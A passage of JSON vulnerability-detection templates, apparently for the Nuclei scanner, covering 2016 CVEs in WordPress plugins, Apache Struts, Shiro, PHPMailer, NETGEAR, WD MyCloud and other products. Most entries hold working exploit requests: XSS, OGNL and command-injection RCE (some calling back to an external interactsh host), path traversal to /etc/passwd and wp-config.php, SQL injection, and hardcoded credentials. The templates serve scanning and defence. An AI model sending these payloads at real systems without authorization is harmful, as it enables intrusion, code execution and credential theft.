to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3081","info":{"name":"Apache S2-032 Struts - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7552","info":{"name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/logoff.cgi"],"headers":{"Cookie":"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Memory map"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-8527","info":{"name":"Aruba Airwave <8.2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1555","info":{"name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /boardDataWW.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmacAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2016-1000140","info":{"name":"WordPress New Year Firework <=1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["New Year Firework ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10940","info":{"name":"WordPress zm-gallery plugin 1.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200","contains(body_2, \"[zm_gallery id=\")","contains(body_2, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")","!contains(body_3, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")"],"condition":"and"}]}]},{"id":"CVE-2016-5649","info":{"name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /BSW_cxttongr.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Smart Wizard Result</title> "]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<b>Success \"([a-z]+)\""],"part":"body"}]}]},{"id":"CVE-2016-7981","info":{"name":"SPIP <3.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-5674","info":{"name":"NUUO NVR camera `debugging_center_utils_.php` - Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20id","{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20ipconfig"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, 'Debugging Center')","regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body_1)"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'Debugging Center')","contains(body_2, 'Windows IP')"],"condition":"and"}]}]},{"id":"CVE-2016-1000149","info":{"name":"WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/simpel-reserveren/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Simpel Reserveren","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10134","info":{"name":"Zabbix - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error in query [INSERT INTO profiles (profileid, userid","You have an error in your SQL syntax"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000127","info":{"name":"WordPress AJAX Random Post <=2.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ajax Random Post"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10368","info":{"name":"Opsview Monitor Pro - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2016-1000153","info":{"name":"WordPress Tidio Gallery <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/tidio-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Tidio Gallery","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10973","info":{"name":"Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"tab = alert(document.domain);\")","contains(body_2, \"Brafton Article Loader\")"],"condition":"and"}]}]},{"id":"CVE-2016-1000128","info":{"name":"WordPress anti-plagiarism <=3.60 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["anti plagiarism","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000137","info":{"name":"WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Hero Maps Pro ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10993","info":{"name":"ScoreMe Theme - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/scoreme/style"]}]},{"method":"GET","path":["{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10960","info":{"name":"WordPress wSecure Lite < 2.4 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"],"body":"wsecure_action=update&publish=\";} header(\"{{name}}: CVE-2016-10960\"); class WSecureConfig2 {var $test=\"","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["{{name}}: CVE-2016-10960"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6195","info":{"name":"vBulletin <= 4.2.3 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"],"stop-at-first-match":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["type=dberror"]},{"type":"status","status":[200,503],"condition":"or"}]}]},{"id":"CVE-2016-10367","info":{"name":"Opsview Monitor Pro - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2016-10033","info":{"name":"WordPress PHPMailer < 5.2.18 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n","POST /wp-login.php?action=lostpassword HTTP/1.1\nHost: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nwp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wp-login.php?checkemail=confirm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2016-1000126","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Admin Font Editor"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3978","info":{"name":"Fortinet FortiOS  - Open Redirect/Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redir=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2016-1000134","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["HDW WordPress Video Gallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000129","info":{"name":"WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/defa-online-image-protector/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Defa Online Image Protector"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4437","info":{"name":"Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2016-1000138","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["= Indexisto"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10108","info":{"name":"Western Digital MyCloud NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"WDMyCloud\")","contains(interactsh_protocol, \"dns\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2016-1000142","info":{"name":"WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/parsi-font/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP-Parsi Admin Font Editor","MW Font Changer"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000132","info":{"name":"WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/enhanced-tooltipglossary/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["CM Tooltip Glossary"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6277","info":{"name":"NETGEAR Routers - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4977","info":{"name":"Spring Security OAuth2 Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unsupported response types: [978015547]"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2016-1000148","info":{"name":"WordPress S3 Video <=0.983 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/s3-video/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["S3 Video Plugin ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script><\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000135","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["HDW WordPress Video Gallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7834","info":{"name":"Sony IPELA Engine IP Camera - Hardcoded Account","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command/prima-factory.cgi"],"headers":{"Authorization":"Bearer cHJpbWFuYTpwcmltYW5h"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["gen5th","gen6th"],"condition":"or"},{"type":"status","status":[204]}]}]},{"id":"CVE-2016-10924","info":{"name":"Wordpress Zedna eBook download <1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000131","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Search","Tags:","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-2389","info":{"name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000133","info":{"name":"WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Forget About Shortcode Buttons ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4975","info":{"name":"Apache mod_userdir CRLF injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)"]}]}]},{"id":"CVE-2016-1000143","info":{"name":"WordPress Photoxhibit 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["PhotoXhibit","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000152","info":{"name":"WordPress Tidio-form <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Easy Contact Form Builder ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6601","info":{"name":"ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-0957","info":{"name":"Adobe AEM Dispatcher <4.15 - Rules Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/console?.css"],"headers":{"Authorization":"Basic YWRtaW46YWRtaW4K"},"matchers-condition":"and","matchers":[{"type":"word","words":["Adobe","java.lang","(Runtime)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000136","info":{"name":"WordPress heat-trackr 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/heat-trackr/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3088","info":{"name":"Apache ActiveMQ Fileserver - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["PUT /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{rand1}}\n","GET /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1==204","status_code_2==200","contains((body_2), '{{rand1}}')"],"condition":"and"}]}]},{"id":"CVE-2016-1000139","info":{"name":"WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Infusionsoft","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><\"","input type=\"text\" 